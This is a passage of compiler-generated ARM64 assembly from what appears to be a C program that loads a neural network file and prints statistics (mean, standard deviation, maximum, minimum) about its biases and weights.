.cfi_def_cfa_offset 16
mov x29, sp
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x0, l_.str.59@PAGE
add x0, x0, l_.str.59@PAGEOFF
bl _printf
bl _getchar
ldp x29, x30, [sp], #16 ; 16-byte Folded Reload
ret
.cfi_endproc
; -- End function
.globl _InterLoadNetwork ; -- Begin function InterLoadNetwork
.p2align 2
_InterLoadNetwork: ; @InterLoadNetwork
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
; kill: def $x8 killed $xzr
stur xzr, [x29, #-8]
mov x0, #1024
str x0, [sp, #16] ; 8-byte Folded Spill
bl _malloc
mov x8, x0
ldr x0, [sp, #16] ; 8-byte Folded Reload
stur x8, [x29, #-24]
bl _malloc
str x0, [sp, #32]
str xzr, [sp, #24]
adrp x0, l_.str.60@PAGE
add x0, x0, l_.str.60@PAGEOFF
bl _printf
adrp x0, l_.str.61@PAGE
add x0, x0, l_.str.61@PAGEOFF
bl _printf
ldur x0, [x29, #-24]
adrp x8, ___stdinp@GOTPAGE
ldr x8, [x8, ___stdinp@GOTPAGEOFF]
ldr x2, [x8]
mov w1, #1024
bl _fgets
ldur x0, [x29, #-24]
bl _atoi
add w8, w0, #48
sturb w8, [x29, #-9]
ldursb w8, [x29, #-9]
subs w8, w8, #49
cset w8, ne
tbnz w8, #0, LBB23_4
b LBB23_1
LBB23_1:
adrp x0, l_.str.62@PAGE
add x0, x0, l_.str.62@PAGEOFF
bl _printf
ldr x0, [sp, #32]
adrp x8, ___stdinp@GOTPAGE
ldr x8, [x8, ___stdinp@GOTPAGEOFF]
ldr x2, [x8]
mov w1, #1024
bl _fgets
ldr x0, [sp, #32]
bl _InterfaceControleChaine
str x0, [sp, #24]
ldr x0, [sp, #24]
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
bl _fopen
stur x0, [x29, #-8]
ldur x8, [x29, #-8]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB23_3
b LBB23_2
LBB23_2:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
adrp x1, l_.str.63@PAGE
add x1, x1, l_.str.63@PAGEOFF
bl _fprintf
mov w0, #1
bl _exit
LBB23_3:
ldr x8, [sp, #24]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.64@PAGE
add x0, x0, l_.str.64@PAGEOFF
bl _printf
b LBB23_7
LBB23_4:
adrp x0, l_.str.65@PAGE
add x0, x0, l_.str.65@PAGEOFF
bl _printf
adrp x0, l_.str.66@PAGE
add x0, x0, l_.str.66@PAGEOFF
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
bl _fopen
stur x0, [x29, #-8]
ldur x8, [x29, #-8]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB23_6
b LBB23_5
LBB23_5:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
adrp x1, l_.str.63@PAGE
add x1, x1, l_.str.63@PAGEOFF
bl _fprintf
mov w0, #1
bl _exit
LBB23_6:
b LBB23_7
LBB23_7:
ldur x0, [x29, #-8]
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.globl _mean ; -- Begin function mean
.p2align 2
_mean: ; @mean
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #24]
str w1, [sp, #20]
movi d0, #0000000000000000
str d0, [sp, #8]
str wzr, [sp, #4]
b LBB24_1
LBB24_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #4]
ldr w9, [sp, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB24_4
b LBB24_2
LBB24_2: ; in Loop: Header=BB24_1 Depth=1
ldr x8, [sp, #24]
ldr x8, [x8, #24]
ldrsw x9, [sp, #4]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr d1, [x8, #8]
ldr d0, [sp, #8]
fadd d0, d0, d1
str d0, [sp, #8]
b LBB24_3
LBB24_3: ; in Loop: Header=BB24_1 Depth=1
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB24_1
LBB24_4:
ldr d0, [sp, #8]
ldr s2, [sp, #20]
; implicit-def: $d1
fmov s1, s2
sshll.2d v1, v1, #0
; kill: def $d1 killed $d1 killed $q1
scvtf d1, d1
fdiv d0, d0, d1
str d0, [sp, #8]
ldr d0, [sp, #8]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _standardDev ; -- Begin function standardDev
.p2align 2
_standardDev: ; @standardDev
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur w1, [x29, #-12]
movi d0, #0000000000000000
stur d0, [x29, #-24]
stur wzr, [x29, #-28]
b LBB25_1
LBB25_1: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-28]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB25_4
b LBB25_2
LBB25_2: ; in Loop: Header=BB25_1 Depth=1
ldur x8, [x29, #-8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-28]
mov x10, #48
str x10, [sp] ; 8-byte Folded Spill
mul x9, x9, x10
add x8, x8, x9
ldr d0, [x8, #8]
str d0, [sp, #8] ; 8-byte Folded Spill
ldur x0, [x29, #-8]
ldur w1, [x29, #-12]
bl _mean
ldr x10, [sp] ; 8-byte Folded Reload
fmov d1, d0
ldr d0, [sp, #8] ; 8-byte Folded Reload
fsub d0, d0, d1
str d0, [sp, #24] ; 8-byte Folded Spill
ldur x8, [x29, #-8]
ldr x8, [x8, #24]
ldursw x9, [x29, #-28]
mul x9, x9, x10
add x8, x8, x9
ldr d0, [x8, #8]
str d0, [sp, #16] ; 8-byte Folded Spill
ldur x0, [x29, #-8]
ldur w1, [x29, #-12]
bl _mean
ldr d1, [sp, #16] ; 8-byte Folded Reload
fmov d2, d0
ldr d0, [sp, #24] ; 8-byte Folded Reload
fsub d1, d1, d2
ldur d2, [x29, #-24]
fmadd d0, d0, d1, d2
stur d0, [x29, #-24]
b LBB25_3
LBB25_3: ; in Loop: Header=BB25_1 Depth=1
ldur w8, [x29, #-28]
add w8, w8, #1
stur w8, [x29, #-28]
b LBB25_1
LBB25_4:
ldur d0, [x29, #-24]
ldur s2, [x29, #-12]
; implicit-def: $d1
fmov s1, s2
sshll.2d v1, v1, #0
; kill: def $d1 killed $d1 killed $q1
scvtf d1, d1
fdiv d0, d0, d1
fsqrt d0, d0
stur d0, [x29, #-24]
ldur d0, [x29, #-24]
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.globl _maximum ; -- Begin function maximum
.p2align 2
_maximum: ; @maximum
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #24]
str w1, [sp, #20]
ldr x8, [sp, #24]
ldr x8, [x8, #24]
ldr d0, [x8, #8]
str d0, [sp, #8]
mov w8, #1
str w8, [sp, #4]
b LBB26_1
LBB26_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #4]
ldr w9, [sp, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB26_6
b LBB26_2
LBB26_2: ; in Loop: Header=BB26_1 Depth=1
ldr d0, [sp, #8]
ldr x8, [sp, #24]
ldr x8, [x8, #24]
ldrsw x9, [sp, #4]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr d1, [x8, #8]
fcmp d0, d1
cset w8, pl
tbnz w8, #0, LBB26_4
b LBB26_3
LBB26_3: ; in Loop: Header=BB26_1 Depth=1
ldr x8, [sp, #24]
ldr x8, [x8, #24]
ldrsw x9, [sp, #4]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr d0, [x8, #8]
str d0, [sp, #8]
b LBB26_4
LBB26_4: ; in Loop: Header=BB26_1 Depth=1
b LBB26_5
LBB26_5: ; in Loop: Header=BB26_1 Depth=1
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB26_1
LBB26_6:
ldr d0, [sp, #8]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _minimum ; -- Begin function minimum
.p2align 2
_minimum: ; @minimum
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #24]
str w1, [sp, #20]
ldr x8, [sp, #24]
ldr x8, [x8, #24]
ldr d0, [x8, #8]
str d0, [sp, #8]
str wzr, [sp, #4]
b LBB27_1
LBB27_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #4]
ldr w9, [sp, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB27_6
b LBB27_2
LBB27_2: ; in Loop: Header=BB27_1 Depth=1
ldr x8, [sp, #24]
ldr x8, [x8, #24]
ldrsw x9, [sp, #4]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr d0, [x8, #8]
ldr d1, [sp, #8]
fcmp d0, d1
cset w8, pl
tbnz w8, #0, LBB27_4
b LBB27_3
LBB27_3: ; in Loop: Header=BB27_1 Depth=1
ldr x8, [sp, #24]
ldr x8, [x8, #24]
ldrsw x9, [sp, #4]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr d0, [x8, #8]
str d0, [sp, #8]
b LBB27_4
LBB27_4: ; in Loop: Header=BB27_1 Depth=1
b LBB27_5
LBB27_5: ; in Loop: Header=BB27_1 Depth=1
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB27_1
LBB27_6:
ldr d0, [sp, #8]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _statInfosBiais ; -- Begin function statInfosBiais
.p2align 2
_statInfosBiais: ; @statInfosBiais
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
str wzr, [sp, #20]
; kill: def $x8 killed $xzr
str xzr, [sp, #8]
ldur x8, [x29, #-8]
ldr x8, [x8, #8]
str x8, [sp, #8]
adrp x0, l_.str.67@PAGE
add x0, x0, l_.str.67@PAGEOFF
bl _printf
str wzr, [sp, #20]
b LBB28_1
LBB28_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #20]
ldur x9, [x29, #-8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB28_6
b LBB28_2
LBB28_2: ; in Loop: Header=BB28_1 Depth=1
ldr w8, [sp, #20]
add w10, w8, #1
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.68@PAGE
add x0, x0, l_.str.68@PAGEOFF
bl _printf
ldr x8, [sp, #8]
ldr x8, [x8]
ldr w9, [x8, #20]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.69@PAGE
add x0, x0, l_.str.69@PAGEOFF
bl _printf
ldr x8, [sp, #8]
ldr x0, [x8]
ldr x8, [sp, #8]
ldr x8, [x8]
ldr w1, [x8, #20]
bl _mean
stur d0, [x29, #-16]
ldur d0, [x29, #-16]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.70@PAGE
add x0, x0, l_.str.70@PAGEOFF
bl _printf
ldr x8, [sp, #8]
ldr x0, [x8]
ldr x8, [sp, #8]
ldr x8, [x8]
ldr w1, [x8, #20]
bl _standardDev
stur d0, [x29, #-24]
ldur d0, [x29, #-24]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.71@PAGE
add x0, x0, l_.str.71@PAGEOFF
bl _printf
ldr x8, [sp, #8]
ldr x0, [x8]
ldr x8, [sp, #8]
ldr x8, [x8]
ldr w1, [x8, #20]
bl _maximum
str d0, [sp, #24]
ldr d0, [sp, #24]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.72@PAGE
add x0, x0, l_.str.72@PAGEOFF
bl _printf
ldr x8, [sp, #8]
ldr x0, [x8]
ldr x8, [sp, #8]
ldr x8, [x8]
ldr w1, [x8, #20]
bl _minimum
str d0, [sp, #32]
ldr d0, [sp, #32]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.73@PAGE
add x0, x0, l_.str.73@PAGEOFF
bl _printf
adrp x0, l_.str.45@PAGE
add x0, x0, l_.str.45@PAGEOFF
bl _printf
ldr x8, [sp, #8]
ldr x8, [x8, #8]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB28_4
b LBB28_3
LBB28_3:
b LBB28_6
LBB28_4: ; in Loop: Header=BB28_1 Depth=1
ldr x8, [sp, #8]
ldr x8, [x8, #8]
str x8, [sp, #8]
b LBB28_5
LBB28_5: ; in Loop: Header=BB28_1 Depth=1
ldr w8, [sp, #20]
add w8, w8, #1
str w8, [sp, #20]
b LBB28_1
LBB28_6:
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.globl _statInfosPoids ; -- Begin function statInfosPoids
.p2align 2
_statInfosPoids: ; @statInfosPoids
.cfi_startproc
; %bb.0:
sub sp, sp, #176
.cfi_def_cfa_offset 176
stp x29, x30, [sp, #160] ; 16-byte Folded Spill
add x29, sp, #160
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur wzr, [x29, #-28]
; kill: def $x8 killed $xzr
stur xzr, [x29, #-40]
ldur x8, [x29, #-8]
ldr x8, [x8, #8]
stur x8, [x29, #-40]
adrp x0, l_.str.74@PAGE
add x0, x0, l_.str.74@PAGEOFF
bl _printf
stur wzr, [x29, #-28]
b LBB29_1
LBB29_1: ; =>This Loop Header: Depth=1
; Child Loop BB29_3 Depth 2
; Child Loop BB29_5 Depth 3
; Child Loop BB29_11 Depth 2
; Child Loop BB29_13 Depth 3
; Child Loop BB29_19 Depth 2
; Child Loop BB29_21 Depth 3
; Child Loop BB29_29 Depth 2
; Child Loop BB29_35 Depth 2
; Child Loop BB29_37 Depth 3
; Child Loop BB29_45 Depth 2
ldur w8, [x29, #-28]
ldur x9, [x29, #-8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB29_54
b LBB29_2
LBB29_2: ; in Loop: Header=BB29_1 Depth=1
ldur x8, [x29, #-40]
ldr x8, [x8]
ldrsw x8, [x8, #20]
lsl x0, x8, #3
bl _malloc
stur x0, [x29, #-48]
ldur x8, [x29, #-40]
ldr x8, [x8]
ldrsw x8, [x8, #20]
lsl x0, x8, #3
bl _malloc
stur x0, [x29, #-56]
ldur w8, [x29, #-28]
add w10, w8, #1
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.68@PAGE
add x0, x0, l_.str.68@PAGEOFF
bl _printf
ldur x8, [x29, #-40]
ldr x8, [x8]
ldr w9, [x8, #20]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.75@PAGE
add x0, x0, l_.str.75@PAGEOFF
bl _printf
movi d0, #0000000000000000
stur d0, [x29, #-64]
stur d0, [x29, #-72]
stur wzr, [x29, #-76]
str wzr, [sp, #80]
b LBB29_3
LBB29_3: ; Parent Loop BB29_1 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB29_5 Depth 3
ldr w8, [sp, #80]
ldur x9, [x29, #-40]
ldr x9, [x9]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB29_10
b LBB29_4
LBB29_4: ; in Loop: Header=BB29_3 Depth=2
str wzr, [sp, #76]
b LBB29_5
LBB29_5: ; Parent Loop BB29_1 Depth=1
; Parent Loop BB29_3 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #76]
ldur x9, [x29, #-40]
ldr x9, [x9]
ldr x9, [x9, #24]
ldursw x10, [x29, #-28]
mov x11, #48
mul x10, x10, x11
ldr w9, [x9, x10]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB29_8
b LBB29_6
LBB29_6: ; in Loop: Header=BB29_5 Depth=3
ldur x8, [x29, #-40]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #80]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #16]
ldrsw x9, [sp, #76]
ldr d1, [x8, x9, lsl #3]
ldur d0, [x29, #-72]
fadd d0, d0, d1
stur d0, [x29, #-72]
ldur x8, [x29, #-40]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #80]
mul x9, x9, x10
ldr w9, [x8, x9]
ldur w8, [x29, #-76]
add w8, w8, w9
stur w8, [x29, #-76]
b LBB29_7
LBB29_7: ; in Loop: Header=BB29_5 Depth=3
ldr w8, [sp, #76]
add w8, w8, #1
str w8, [sp, #76]
b LBB29_5
LBB29_8: ; in Loop: Header=BB29_3 Depth=2
ldur d1, [x29, #-72]
ldur d0, [x29, #-64]
fadd d0, d0, d1
stur d0, [x29, #-64]
b LBB29_9
LBB29_9: ; in Loop: Header=BB29_3 Depth=2
ldr w8, [sp, #80]
add w8, w8, #1
str w8, [sp, #80]
b LBB29_3
LBB29_10: ; in Loop: Header=BB29_1 Depth=1
ldur d0, [x29, #-64]
ldur s2, [x29, #-76]
; implicit-def: $d1
fmov s1, s2
sshll.2d v1, v1, #0
; kill: def $d1 killed $d1 killed $q1
scvtf d1, d1
fdiv d0, d0, d1
stur d0, [x29, #-64]
ldur d0, [x29, #-64]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.70@PAGE
add x0, x0, l_.str.70@PAGEOFF
bl _printf
movi d0, #0000000000000000
str d0, [sp, #64]
str wzr, [sp, #60]
b LBB29_11
LBB29_11: ; Parent Loop BB29_1 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB29_13 Depth 3
ldr w8, [sp, #60]
ldur x9, [x29, #-40]
ldr x9, [x9]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB29_18
b LBB29_12
LBB29_12: ; in Loop: Header=BB29_11 Depth=2
str wzr, [sp, #56]
b LBB29_13
LBB29_13: ; Parent Loop BB29_1 Depth=1
; Parent Loop BB29_11 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #56]
ldur x9, [x29, #-40]
ldr x9, [x9]
ldr x9, [x9, #24]
ldrsw x10, [sp, #60]
mov x11, #48
mul x10, x10, x11
ldr w9, [x9, x10]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB29_16
b LBB29_14
LBB29_14: ; in Loop: Header=BB29_13 Depth=3
ldur x8, [x29, #-40]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #60]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #16]
ldrsw x9, [sp, #56]
ldr d0, [x8, x9, lsl #3]
ldur d1, [x29, #-64]
fsub d0, d0, d1
ldur x8, [x29, #-40]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #60]
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #16]
ldrsw x9, [sp, #56]
ldr d1, [x8, x9, lsl #3]
ldur d2, [x29, #-64]
fsub d1, d1, d2
ldr d2, [sp, #64]
fmadd d0, d0, d1, d2
str d0, [sp, #64]
b LBB29_15
LBB29_15: ; in Loop: Header=BB29_13 Depth=3
ldr w8, [sp, #56]
add w8, w8, #1
str w8, [sp, #56]
b LBB29_13
LBB29_16: ; in Loop: Header=BB29_11 Depth=2
b LBB29_17
LBB29_17: ; in Loop: Header=BB29_11 Depth=2
ldr w8, [sp, #60]
add w8, w8, #1
str w8, [sp, #60]
b LBB29_11
LBB29_18: ; in Loop: Header=BB29_1 Depth=1
ldr d0, [sp, #64]
ldur s2, [x29, #-76]
; implicit-def: $d1
fmov s1, s2
sshll.2d v1, v1, #0
; kill: def $d1 killed $d1 killed $q1
scvtf d1, d1
fdiv d0, d0, d1
fsqrt d0, d0
str d0, [sp, #64]
ldr d0, [sp, #64]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.71@PAGE
add x0, x0, l_.str.71@PAGEOFF
bl _printf
str wzr, [sp, #52]
b LBB29_19
LBB29_19: ; Parent Loop BB29_1 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB29_21 Depth 3
ldr w8, [sp, #52]
ldur x9, [x29, #-40]
ldr x9, [x9]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB29_28
b LBB29_20
LBB29_20: ; in Loop: Header=BB29_19 Depth=2
ldur x8, [x29, #-40]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #52]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #16]
ldr d0, [x8]
str d0, [sp, #40]
mov w8, #1
str w8, [sp, #36]
b LBB29_21
LBB29_21: ; Parent Loop BB29_1 Depth=1
; Parent Loop BB29_19 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #36]
ldur x9, [x29, #-40]
ldr x9, [x9]
ldr x9, [x9, #24]
ldrsw x10, [sp, #52]
mov x11, #48
mul x10, x10, x11
ldr w9, [x9, x10]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB29_26
b LBB29_22
LBB29_22: ; in Loop: Header=BB29_21 Depth=3
ldr d0, [sp, #40]
ldur x8, [x29, #-40]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #52]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #16]
ldrsw x9, [sp, #36]
ldr d1, [x8, x9, lsl #3]
fcmp d0, d1
cset w8, pl
tbnz w8, #0, LBB29_24
b LBB29_23
LBB29_23: ; in Loop: Header=BB29_21 Depth=3
ldur x8, [x29, #-40]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #52]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #16]
ldrsw x9, [sp, #36]
ldr d0, [x8, x9, lsl #3]
str d0, [sp, #40]
b LBB29_24
LBB29_24: ; in Loop: Header=BB29_21 Depth=3
b LBB29_25
LBB29_25: ; in Loop: Header=BB29_21 Depth=3
ldr w8, [sp, #36]
add w8, w8, #1
str w8, [sp, #36]
b LBB29_21
LBB29_26: ; in Loop: Header=BB29_19 Depth=2
ldr d0, [sp, #40]
ldur x8, [x29, #-48]
ldrsw x9, [sp, #52]
str d0, [x8, x9, lsl #3]
b LBB29_27
LBB29_27: ; in Loop: Header=BB29_19 Depth=2
ldr w8, [sp, #52]
add w8, w8, #1
str w8, [sp, #52]
b LBB29_19
LBB29_28: ; in Loop: Header=BB29_1 Depth=1
ldur x8, [x29, #-48]
ldr d0, [x8]
stur d0, [x29, #-24]
mov w8, #1
str w8, [sp, #32]
b LBB29_29
LBB29_29: ; Parent Loop BB29_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #32]
ldur x9, [x29, #-40]
ldr x9, [x9]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB29_34
b LBB29_30
LBB29_30: ; in Loop: Header=BB29_29 Depth=2
ldur d0, [x29, #-24]
ldur x8, [x29, #-48]
ldrsw x9, [sp, #32]
ldr d1, [x8, x9, lsl #3]
fcmp d0, d1
cset w8, pl
tbnz w8, #0, LBB29_32
b LBB29_31
LBB29_31: ; in Loop: Header=BB29_29 Depth=2
ldur x8, [x29, #-48]
ldrsw x9, [sp, #32]
ldr d0, [x8, x9, lsl #3]
stur d0, [x29, #-24]
b LBB29_32
LBB29_32: ; in Loop: Header=BB29_29 Depth=2
b LBB29_33
LBB29_33: ; in Loop: Header=BB29_29 Depth=2
ldr w8, [sp, #32]
add w8, w8, #1
str w8, [sp, #32]
b LBB29_29
LBB29_34: ; in Loop: Header=BB29_1 Depth=1
ldur d0, [x29, #-24]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.72@PAGE
add x0, x0, l_.str.72@PAGEOFF
bl _printf
str wzr, [sp, #28]
b LBB29_35
LBB29_35: ; Parent Loop BB29_1 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB29_37 Depth 3
ldr w8, [sp, #28]
ldur x9, [x29, #-40]
ldr x9, [x9]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB29_44
b LBB29_36
LBB29_36: ; in Loop: Header=BB29_35 Depth=2
ldur x8, [x29, #-40]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #28]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #16]
ldr d0, [x8]
str d0, [sp, #16]
mov w8, #1
str w8, [sp, #12]
b LBB29_37
LBB29_37: ; Parent Loop BB29_1 Depth=1
; Parent Loop BB29_35 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #12]
ldur x9, [x29, #-40]
ldr x9, [x9]
ldr x9, [x9, #24]
ldrsw x10, [sp, #28]
mov x11, #48
mul x10, x10, x11
ldr w9, [x9, x10]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB29_42
b LBB29_38
LBB29_38: ; in Loop: Header=BB29_37 Depth=3
ldr d0, [sp, #16]
ldur x8, [x29, #-40]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #28]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #16]
ldrsw x9, [sp, #12]
ldr d1, [x8, x9, lsl #3]
fcmp d0, d1
cset w8, le
tbnz w8, #0, LBB29_40
b LBB29_39
LBB29_39: ; in Loop: Header=BB29_37 Depth=3
ldur x8, [x29, #-40]
ldr x8, [x8]
ldr x8, [x8, #24]
ldrsw x9, [sp, #28]
mov x10, #48
mul x9, x9, x10
add x8, x8, x9
ldr x8, [x8, #16]
ldrsw x9, [sp, #12]
ldr d0, [x8, x9, lsl #3]
str d0, [sp, #16]
b LBB29_40
LBB29_40: ; in Loop: Header=BB29_37 Depth=3
b LBB29_41
LBB29_41: ; in Loop: Header=BB29_37 Depth=3
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB29_37
LBB29_42: ; in Loop: Header=BB29_35 Depth=2
ldr d0, [sp, #16]
ldur x8, [x29, #-56]
ldrsw x9, [sp, #28]
str d0, [x8, x9, lsl #3]
b LBB29_43
LBB29_43: ; in Loop: Header=BB29_35 Depth=2
ldr w8, [sp, #28]
add w8, w8, #1
str w8, [sp, #28]
b LBB29_35
LBB29_44: ; in Loop: Header=BB29_1 Depth=1
ldur x8, [x29, #-56]
ldr d0, [x8]
stur d0, [x29, #-16]
mov w8, #1
str w8, [sp, #8]
b LBB29_45
LBB29_45: ; Parent Loop BB29_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #8]
ldur x9, [x29, #-40]
ldr x9, [x9]
ldr w9, [x9, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB29_50
b LBB29_46
LBB29_46: ; in Loop: Header=BB29_45 Depth=2
ldur d0, [x29, #-16]
ldur x8, [x29, #-56]
ldrsw x9, [sp, #8]
ldr d1, [x8, x9, lsl #3]
fcmp d0, d1
cset w8, le
tbnz w8, #0, LBB29_48
b LBB29_47
LBB29_47: ; in Loop: Header=BB29_45 Depth=2
ldur x8, [x29, #-56]
ldrsw x9, [sp, #8]
ldr d0, [x8, x9, lsl #3]
stur d0, [x29, #-16]
b LBB29_48
LBB29_48: ; in Loop: Header=BB29_45 Depth=2
b LBB29_49
LBB29_49: ; in Loop: Header=BB29_45 Depth=2
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB29_45
LBB29_50: ; in Loop: Header=BB29_1 Depth=1
ldur d0, [x29, #-16]
mov x8, sp
str d0, [x8]
adrp x0, l_.str.76@PAGE
add x0, x0, l_.str.76@PAGEOFF
bl _printf
adrp x0, l_.str.45@PAGE
add x0, x0, l_.str.45@PAGEOFF
bl _printf
ldur x8, [x29, #-40]
ldr x8, [x8, #8]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB29_52
b LBB29_51
LBB29_51:
b LBB29_54
LBB29_52: ; in Loop: Header=BB29_1 Depth=1
ldur x8, [x29, #-40]
ldr x8, [x8, #8]
stur x8, [x29, #-40]
b LBB29_53
LBB29_53: ; in Loop: Header=BB29_1 Depth=1
ldur w8, [x29, #-28]
add w8, w8, #1
stur w8, [x29, #-28]
b LBB29_1
LBB29_54:
ldp x29, x30, [sp, #160] ; 16-byte Folded Reload
add sp, sp, #176
ret
.cfi_endproc
; -- End function
.globl _InfosStatistiques ; -- Begin function InfosStatistiques
.p2align 2
_InfosStatistiques: ; @InfosStatistiques
.cfi_startproc
; %bb.0:
sub sp, sp, #384
.cfi_def_cfa_offset 384
stp x28, x27, [sp, #352] ; 16-byte Folded Spill
stp x29, x30, [sp, #368] ; 16-byte Folded Spill
add x29, sp, #368
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
adrp x8, ___stack_chk_guard@GOTPAGE
